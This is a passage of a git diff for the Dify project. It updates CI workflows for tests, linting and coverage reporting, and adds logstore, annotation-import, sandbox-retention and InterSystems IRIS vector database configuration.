diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
File-level coverage (click to expand)" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "
" + } >> $GITHUB_STEP_SUMMARY diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..2f457d0a0a 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -35,10 +36,11 @@ jobs: - name: ast-grep run: | - uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all - uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all + # ast-grep exits 1 if no matches are found; allow idempotent runs. 
+ uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true + uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true # Convert Optional[T] to T | None (ignoring quoted types) cat > /tmp/optional-rule.yml << 'EOF' id: convert-optional-to-union @@ -56,14 +58,15 @@ jobs: pattern: $T fix: $T | None EOF - uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all + uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all # Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax) find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**" - name: Install pnpm uses: pnpm/action-setup@v4 @@ -76,7 +79,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies working-directory: ./web @@ -84,7 +87,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . 
- uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 diff --git a/.github/workflows/style.yml b/.github/workflows/style.yml index 5a8a34be79..2fb8121f74 100644 --- a/.github/workflows/style.yml +++ b/.github/workflows/style.yml @@ -90,7 +90,7 @@ jobs: with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Web dependencies if: steps.changed-files.outputs.any_changed == 'true' diff --git a/.github/workflows/translate-i18n-base-on-english.yml b/.github/workflows/translate-i18n-base-on-english.yml index fe8e2ebc2b..8bb82d5d44 100644 --- a/.github/workflows/translate-i18n-base-on-english.yml +++ b/.github/workflows/translate-i18n-base-on-english.yml @@ -55,7 +55,7 @@ jobs: with: node-version: 'lts/*' cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml - name: Install dependencies if: env.FILES_CHANGED == 'true' diff --git a/.github/workflows/web-tests.yml b/.github/workflows/web-tests.yml index 3313e58614..b1f32f96c2 100644 --- a/.github/workflows/web-tests.yml +++ b/.github/workflows/web-tests.yml @@ -13,6 +13,7 @@ jobs: runs-on: ubuntu-latest defaults: run: + shell: bash working-directory: ./web steps: @@ -21,14 +22,7 @@ jobs: with: persist-credentials: false - - name: Check changed files - id: changed-files - uses: tj-actions/changed-files@v46 - with: - files: web/** - - name: Install pnpm - if: steps.changed-files.outputs.any_changed == 'true' uses: pnpm/action-setup@v4 with: package_json_file: web/package.json @@ -36,23 +30,355 @@ jobs: - name: Setup Node.js uses: actions/setup-node@v4 - if: steps.changed-files.outputs.any_changed == 'true' with: node-version: 22 cache: pnpm - cache-dependency-path: ./web/package.json + cache-dependency-path: ./web/pnpm-lock.yaml + + - name: Restore Jest cache + uses: actions/cache@v4 + with: + path: web/.cache/jest + key: ${{ runner.os }}-jest-${{ hashFiles('web/pnpm-lock.yaml') }} + 
restore-keys: | + ${{ runner.os }}-jest- - name: Install dependencies - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm install --frozen-lockfile - name: Check i18n types synchronization - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web run: pnpm run check:i18n-types - name: Run tests - if: steps.changed-files.outputs.any_changed == 'true' - working-directory: ./web - run: pnpm test + run: | + pnpm exec jest \ + --ci \ + --maxWorkers=100% \ + --coverage \ + --passWithNoTests + + - name: Coverage Summary + if: always() + id: coverage-summary + run: | + set -eo pipefail + + COVERAGE_FILE="coverage/coverage-final.json" + COVERAGE_SUMMARY_FILE="coverage/coverage-summary.json" + + if [ ! -f "$COVERAGE_FILE" ] && [ ! -f "$COVERAGE_SUMMARY_FILE" ]; then + echo "has_coverage=false" >> "$GITHUB_OUTPUT" + echo "### 🚨 Test Coverage Report :test_tube:" >> "$GITHUB_STEP_SUMMARY" + echo "Coverage data not found. Ensure Jest runs with coverage enabled." >> "$GITHUB_STEP_SUMMARY" + exit 0 + fi + + echo "has_coverage=true" >> "$GITHUB_OUTPUT" + + node <<'NODE' >> "$GITHUB_STEP_SUMMARY" + const fs = require('fs'); + const path = require('path'); + let libCoverage = null; + + try { + libCoverage = require('istanbul-lib-coverage'); + } catch (error) { + libCoverage = null; + } + + const summaryPath = path.join('coverage', 'coverage-summary.json'); + const finalPath = path.join('coverage', 'coverage-final.json'); + + const hasSummary = fs.existsSync(summaryPath); + const hasFinal = fs.existsSync(finalPath); + + if (!hasSummary && !hasFinal) { + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('No coverage data found.'); + process.exit(0); + } + + const summary = hasSummary + ? JSON.parse(fs.readFileSync(summaryPath, 'utf8')) + : null; + const coverage = hasFinal + ? 
JSON.parse(fs.readFileSync(finalPath, 'utf8')) + : null; + + const getLineCoverageFromStatements = (statementMap, statementHits) => { + const lineHits = {}; + + if (!statementMap || !statementHits) { + return lineHits; + } + + Object.entries(statementMap).forEach(([key, statement]) => { + const line = statement?.start?.line; + if (!line) { + return; + } + const hits = statementHits[key] ?? 0; + const previous = lineHits[line]; + lineHits[line] = previous === undefined ? hits : Math.max(previous, hits); + }); + + return lineHits; + }; + + const getFileCoverage = (entry) => ( + libCoverage ? libCoverage.createFileCoverage(entry) : null + ); + + const getLineHits = (entry, fileCoverage) => { + const lineHits = entry.l ?? {}; + if (Object.keys(lineHits).length > 0) { + return lineHits; + } + if (fileCoverage) { + return fileCoverage.getLineCoverage(); + } + return getLineCoverageFromStatements(entry.statementMap ?? {}, entry.s ?? {}); + }; + + const getUncoveredLines = (entry, fileCoverage, lineHits) => { + if (lineHits && Object.keys(lineHits).length > 0) { + return Object.entries(lineHits) + .filter(([, count]) => count === 0) + .map(([line]) => Number(line)) + .sort((a, b) => a - b); + } + if (fileCoverage) { + return fileCoverage.getUncoveredLines(); + } + return []; + }; + + const totals = { + lines: { covered: 0, total: 0 }, + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + }; + const fileSummaries = []; + + if (summary) { + const totalEntry = summary.total ?? {}; + ['lines', 'statements', 'branches', 'functions'].forEach((key) => { + if (totalEntry[key]) { + totals[key].covered = totalEntry[key].covered ?? 0; + totals[key].total = totalEntry[key].total ?? 0; + } + }); + + Object.entries(summary) + .filter(([file]) => file !== 'total') + .forEach(([file, data]) => { + fileSummaries.push({ + file, + pct: data.lines?.pct ?? data.statements?.pct ?? 0, + lines: { + covered: data.lines?.covered ?? 
0, + total: data.lines?.total ?? 0, + }, + }); + }); + } else if (coverage) { + Object.entries(coverage).forEach(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? {}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + totals.lines.total += lineTotal; + totals.lines.covered += lineCovered; + totals.statements.total += statementTotal; + totals.statements.covered += statementCovered; + totals.branches.total += branchTotal; + totals.branches.covered += branchCovered; + totals.functions.total += functionTotal; + totals.functions.covered += functionCovered; + + const pct = (covered, tot) => (tot > 0 ? (covered / tot) * 100 : 0); + + fileSummaries.push({ + file, + pct: pct(lineCovered || statementCovered, lineTotal || statementTotal), + lines: { + covered: lineCovered || statementCovered, + total: lineTotal || statementTotal, + }, + }); + }); + } + + const pct = (covered, tot) => (tot > 0 ? 
((covered / tot) * 100).toFixed(2) : '0.00'); + + console.log('### Test Coverage Summary :test_tube:'); + console.log(''); + console.log('| Metric | Coverage | Covered / Total |'); + console.log('|--------|----------|-----------------|'); + console.log(`| Lines | ${pct(totals.lines.covered, totals.lines.total)}% | ${totals.lines.covered} / ${totals.lines.total} |`); + console.log(`| Statements | ${pct(totals.statements.covered, totals.statements.total)}% | ${totals.statements.covered} / ${totals.statements.total} |`); + console.log(`| Branches | ${pct(totals.branches.covered, totals.branches.total)}% | ${totals.branches.covered} / ${totals.branches.total} |`); + console.log(`| Functions | ${pct(totals.functions.covered, totals.functions.total)}% | ${totals.functions.covered} / ${totals.functions.total} |`); + + console.log(''); + console.log('
File coverage (lowest lines first)'); + console.log(''); + console.log('```'); + fileSummaries + .sort((a, b) => (a.pct - b.pct) || (b.lines.total - a.lines.total)) + .slice(0, 25) + .forEach(({ file, pct, lines }) => { + console.log(`${pct.toFixed(2)}%\t${lines.covered}/${lines.total}\t${file}`); + }); + console.log('```'); + console.log('
'); + + if (coverage) { + const pctValue = (covered, tot) => { + if (tot === 0) { + return '0'; + } + return ((covered / tot) * 100) + .toFixed(2) + .replace(/\.?0+$/, ''); + }; + + const formatLineRanges = (lines) => { + if (lines.length === 0) { + return ''; + } + const ranges = []; + let start = lines[0]; + let end = lines[0]; + + for (let i = 1; i < lines.length; i += 1) { + const current = lines[i]; + if (current === end + 1) { + end = current; + continue; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + start = current; + end = current; + } + ranges.push(start === end ? `${start}` : `${start}-${end}`); + return ranges.join(','); + }; + + const tableTotals = { + statements: { covered: 0, total: 0 }, + branches: { covered: 0, total: 0 }, + functions: { covered: 0, total: 0 }, + lines: { covered: 0, total: 0 }, + }; + const tableRows = Object.entries(coverage) + .map(([file, entry]) => { + const fileCoverage = getFileCoverage(entry); + const lineHits = getLineHits(entry, fileCoverage); + const statementHits = entry.s ?? {}; + const branchHits = entry.b ?? {}; + const functionHits = entry.f ?? 
{}; + + const lineTotal = Object.keys(lineHits).length; + const lineCovered = Object.values(lineHits).filter((n) => n > 0).length; + const statementTotal = Object.keys(statementHits).length; + const statementCovered = Object.values(statementHits).filter((n) => n > 0).length; + const branchTotal = Object.values(branchHits).reduce((acc, branches) => acc + branches.length, 0); + const branchCovered = Object.values(branchHits).reduce( + (acc, branches) => acc + branches.filter((n) => n > 0).length, + 0, + ); + const functionTotal = Object.keys(functionHits).length; + const functionCovered = Object.values(functionHits).filter((n) => n > 0).length; + + tableTotals.lines.total += lineTotal; + tableTotals.lines.covered += lineCovered; + tableTotals.statements.total += statementTotal; + tableTotals.statements.covered += statementCovered; + tableTotals.branches.total += branchTotal; + tableTotals.branches.covered += branchCovered; + tableTotals.functions.total += functionTotal; + tableTotals.functions.covered += functionCovered; + + const uncoveredLines = getUncoveredLines(entry, fileCoverage, lineHits); + + const filePath = entry.path ?? file; + const relativePath = path.isAbsolute(filePath) + ? 
path.relative(process.cwd(), filePath) + : filePath; + + return { + file: relativePath || file, + statements: pctValue(statementCovered, statementTotal), + branches: pctValue(branchCovered, branchTotal), + functions: pctValue(functionCovered, functionTotal), + lines: pctValue(lineCovered, lineTotal), + uncovered: formatLineRanges(uncoveredLines), + }; + }) + .sort((a, b) => a.file.localeCompare(b.file)); + + const columns = [ + { key: 'file', header: 'File', align: 'left' }, + { key: 'statements', header: '% Stmts', align: 'right' }, + { key: 'branches', header: '% Branch', align: 'right' }, + { key: 'functions', header: '% Funcs', align: 'right' }, + { key: 'lines', header: '% Lines', align: 'right' }, + { key: 'uncovered', header: 'Uncovered Line #s', align: 'left' }, + ]; + + const allFilesRow = { + file: 'All files', + statements: pctValue(tableTotals.statements.covered, tableTotals.statements.total), + branches: pctValue(tableTotals.branches.covered, tableTotals.branches.total), + functions: pctValue(tableTotals.functions.covered, tableTotals.functions.total), + lines: pctValue(tableTotals.lines.covered, tableTotals.lines.total), + uncovered: '', + }; + + const rowsForOutput = [allFilesRow, ...tableRows]; + const formatRow = (row) => `| ${columns + .map(({ key }) => String(row[key] ?? '')) + .join(' | ')} |`; + const headerRow = `| ${columns.map(({ header }) => header).join(' | ')} |`; + const dividerRow = `| ${columns + .map(({ align }) => (align === 'right' ? '---:' : ':---')) + .join(' | ')} |`; + + console.log(''); + console.log('
Jest coverage table'); + console.log(''); + console.log(headerRow); + console.log(dividerRow); + rowsForOutput.forEach((row) => console.log(formatRow(row))); + console.log('
'); + } + NODE + + - name: Upload Coverage Artifact + if: steps.coverage-summary.outputs.has_coverage == 'true' + uses: actions/upload-artifact@v4 + with: + name: web-coverage-report + path: web/coverage + retention-days: 30 + if-no-files-found: error diff --git a/.gitignore b/.gitignore index 79ba44b207..5ad728c3da 100644 --- a/.gitignore +++ b/.gitignore @@ -189,6 +189,7 @@ docker/volumes/matrixone/* docker/volumes/mysql/* docker/volumes/seekdb/* !docker/volumes/oceanbase/init.d +docker/volumes/iris/* docker/nginx/conf.d/default.conf docker/nginx/ssl/* diff --git a/.vscode/launch.json.template b/.vscode/launch.json.template index cb934d01b5..bdded1e73e 100644 --- a/.vscode/launch.json.template +++ b/.vscode/launch.json.template @@ -37,7 +37,7 @@ "-c", "1", "-Q", - "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor", + "dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention", "--loglevel", "INFO" ], diff --git a/.windsurf/rules/testing.md b/.windsurf/rules/testing.md deleted file mode 100644 index 64fec20cb8..0000000000 --- a/.windsurf/rules/testing.md +++ /dev/null @@ -1,5 +0,0 @@ -# Windsurf Testing Rules - -- Use `web/testing/testing.md` as the single source of truth for frontend automated testing. -- Honor every requirement in that document when generating or accepting tests. -- When proposing or saving tests, re-read that document and follow every requirement. 
diff --git a/api/.env.example b/api/.env.example index 516a119d98..b87d9c7b02 100644 --- a/api/.env.example +++ b/api/.env.example @@ -543,6 +543,25 @@ APP_MAX_EXECUTION_TIME=1200 APP_DEFAULT_ACTIVE_REQUESTS=0 APP_MAX_ACTIVE_REQUESTS=0 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # Celery beat configuration CELERY_BEAT_SCHEDULER_TIME=1 @@ -660,3 +679,19 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/api/README.md b/api/README.md index 2dab2ec6e6..794b05d3af 
100644 --- a/api/README.md +++ b/api/README.md @@ -84,7 +84,7 @@ 1. If you need to handle and debug the async tasks (e.g. dataset importing and documents indexing), please start the worker service. ```bash -uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor +uv run celery -A app.celery worker -P threads -c 2 --loglevel INFO -Q dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention ``` Additionally, if you want to debug the celery scheduled tasks, you can run the following command in another terminal to start the beat service: diff --git a/api/app_factory.py b/api/app_factory.py index 3a3ee03cff..bcad88e9e0 100644 --- a/api/app_factory.py +++ b/api/app_factory.py @@ -75,6 +75,7 @@ def initialize_extensions(app: DifyApp): ext_import_modules, ext_logging, ext_login, + ext_logstore, ext_mail, ext_migrate, ext_orjson, @@ -83,6 +84,7 @@ def initialize_extensions(app: DifyApp): ext_redis, ext_request_logging, ext_sentry, + ext_session_factory, ext_set_secretkey, ext_storage, ext_timezone, @@ -104,6 +106,7 @@ def initialize_extensions(app: DifyApp): ext_migrate, ext_redis, ext_storage, + ext_logstore, # Initialize logstore after storage, before celery ext_celery, ext_login, ext_mail, @@ -114,6 +117,7 @@ def initialize_extensions(app: DifyApp): ext_commands, ext_otel, ext_request_logging, + ext_session_factory, ] for ext in extensions: short_name = ext.__name__.split(".")[-1] diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index a5916241df..43dddbd011 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -218,7 
+218,7 @@ class PluginConfig(BaseSettings): PLUGIN_DAEMON_TIMEOUT: PositiveFloat | None = Field( description="Timeout in seconds for requests to the plugin daemon (set to None to disable)", - default=300.0, + default=600.0, ) INNER_API_KEY_FOR_PLUGIN: str = Field(description="Inner api key for plugin", default="inner-api-key") @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. 
" @@ -1239,6 +1270,21 @@ class TenantIsolatedTaskQueueConfig(BaseSettings): ) +class SandboxExpiredRecordsCleanConfig(BaseSettings): + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: NonNegativeInt = Field( + description="Graceful period in days for sandbox records clean after subscription expiration", + default=21, + ) + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: PositiveInt = Field( + description="Maximum number of records to process in each batch", + default=1000, + ) + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: PositiveInt = Field( + description="Retention days for sandbox expired workflow_run records and message records", + default=30, + ) + + class FeatureConfig( # place the configs in alphabet order AppExecutionConfig, @@ -1264,6 +1310,7 @@ class FeatureConfig( PositionConfig, RagEtlConfig, RepositoryConfig, + SandboxExpiredRecordsCleanConfig, SecurityConfig, TenantIsolatedTaskQueueConfig, ToolConfig, diff --git a/api/configs/middleware/__init__.py b/api/configs/middleware/__init__.py index a5e35c99ca..63f75924bf 100644 --- a/api/configs/middleware/__init__.py +++ b/api/configs/middleware/__init__.py @@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig from .vdb.couchbase_config import CouchbaseConfig from .vdb.elasticsearch_config import ElasticsearchConfig from .vdb.huawei_cloud_config import HuaweiCloudConfig +from .vdb.iris_config import IrisVectorConfig from .vdb.lindorm_config import LindormConfig from .vdb.matrixone_config import MatrixoneConfig from .vdb.milvus_config import MilvusConfig @@ -106,7 +107,7 @@ class KeywordStoreConfig(BaseSettings): class DatabaseConfig(BaseSettings): # Database type selector - DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field( + DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field( description="Database type to use. 
OceanBase is MySQL-compatible.", default="postgresql", ) @@ -336,6 +337,7 @@ class MiddlewareConfig( ChromaConfig, ClickzettaConfig, HuaweiCloudConfig, + IrisVectorConfig, MilvusConfig, AlibabaCloudMySQLConfig, MyScaleConfig, diff --git a/api/configs/middleware/vdb/iris_config.py b/api/configs/middleware/vdb/iris_config.py new file mode 100644 index 0000000000..c532d191c3 --- /dev/null +++ b/api/configs/middleware/vdb/iris_config.py @@ -0,0 +1,91 @@ +"""Configuration for InterSystems IRIS vector database.""" + +from pydantic import Field, PositiveInt, model_validator +from pydantic_settings import BaseSettings + + +class IrisVectorConfig(BaseSettings): + """Configuration settings for IRIS vector database connection and pooling.""" + + IRIS_HOST: str | None = Field( + description="Hostname or IP address of the IRIS server.", + default="localhost", + ) + + IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field( + description="Port number for IRIS connection.", + default=1972, + ) + + IRIS_USER: str | None = Field( + description="Username for IRIS authentication.", + default="_SYSTEM", + ) + + IRIS_PASSWORD: str | None = Field( + description="Password for IRIS authentication.", + default="Dify@1234", + ) + + IRIS_SCHEMA: str | None = Field( + description="Schema name for IRIS tables.", + default="dify", + ) + + IRIS_DATABASE: str | None = Field( + description="Database namespace for IRIS connection.", + default="USER", + ) + + IRIS_CONNECTION_URL: str | None = Field( + description="Full connection URL for IRIS (overrides individual fields if provided).", + default=None, + ) + + IRIS_MIN_CONNECTION: PositiveInt = Field( + description="Minimum number of connections in the pool.", + default=1, + ) + + IRIS_MAX_CONNECTION: PositiveInt = Field( + description="Maximum number of connections in the pool.", + default=3, + ) + + IRIS_TEXT_INDEX: bool = Field( + description="Enable full-text search index using %iFind.Index.Basic.", + default=True, + ) + + IRIS_TEXT_INDEX_LANGUAGE: 
str = Field( + description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').", + default="en", + ) + + @model_validator(mode="before") + @classmethod + def validate_config(cls, values: dict) -> dict: + """Validate IRIS configuration values. + + Args: + values: Configuration dictionary + + Returns: + Validated configuration dictionary + + Raises: + ValueError: If required fields are missing or pool settings are invalid + """ + # Only validate required fields if IRIS is being used as the vector store + # This allows the config to be loaded even when IRIS is not in use + + # vector_store = os.environ.get("VECTOR_STORE", "") + # We rely on Pydantic defaults for required fields if they are missing from env. + # Strict existence check is removed to allow defaults to work. + + min_conn = values.get("IRIS_MIN_CONNECTION", 1) + max_conn = values.get("IRIS_MAX_CONNECTION", 3) + if min_conn > max_conn: + raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION") + + return values diff --git a/api/constants/languages.py b/api/constants/languages.py index 0312a558c9..8c1ce368ac 100644 --- a/api/constants/languages.py +++ b/api/constants/languages.py @@ -20,6 +20,7 @@ language_timezone_mapping = { "sl-SI": "Europe/Ljubljana", "th-TH": "Asia/Bangkok", "id-ID": "Asia/Jakarta", + "ar-TN": "Africa/Tunis", } languages = list(language_timezone_mapping.keys()) diff --git a/api/controllers/console/admin.py b/api/controllers/console/admin.py index 7aa1e6dbd8..a25ca5ef51 100644 --- a/api/controllers/console/admin.py +++ b/api/controllers/console/admin.py @@ -6,19 +6,20 @@ from flask import request from flask_restx import Resource from pydantic import BaseModel, Field, field_validator from sqlalchemy import select -from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound, Unauthorized -P = ParamSpec("P") -R = TypeVar("R") from configs import dify_config from constants.languages import supported_language from 
controllers.console import console_ns from controllers.console.wraps import only_edition_cloud +from core.db.session_factory import session_factory from extensions.ext_database import db from libs.token import extract_access_token from models.model import App, InstalledApp, RecommendedApp +P = ParamSpec("P") +R = TypeVar("R") + DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}" @@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource): privacy_policy = site.privacy_policy or payload.privacy_policy or "" custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or "" - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id) ).scalar_one_or_none() @@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource): @only_edition_cloud @admin_required def delete(self, app_id): - with Session(db.engine) as session: + with session_factory.create_session() as session: recommended_app = session.execute( select(RecommendedApp).where(RecommendedApp.app_id == str(app_id)) ).scalar_one_or_none() @@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource): if not recommended_app: return {"result": "success"}, 204 - with Session(db.engine) as session: + with session_factory.create_session() as session: app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none() if app: app.is_public = False - with Session(db.engine) as session: + with session_factory.create_session() as session: installed_apps = ( session.execute( select(InstalledApp).where( diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, make_response, request from 
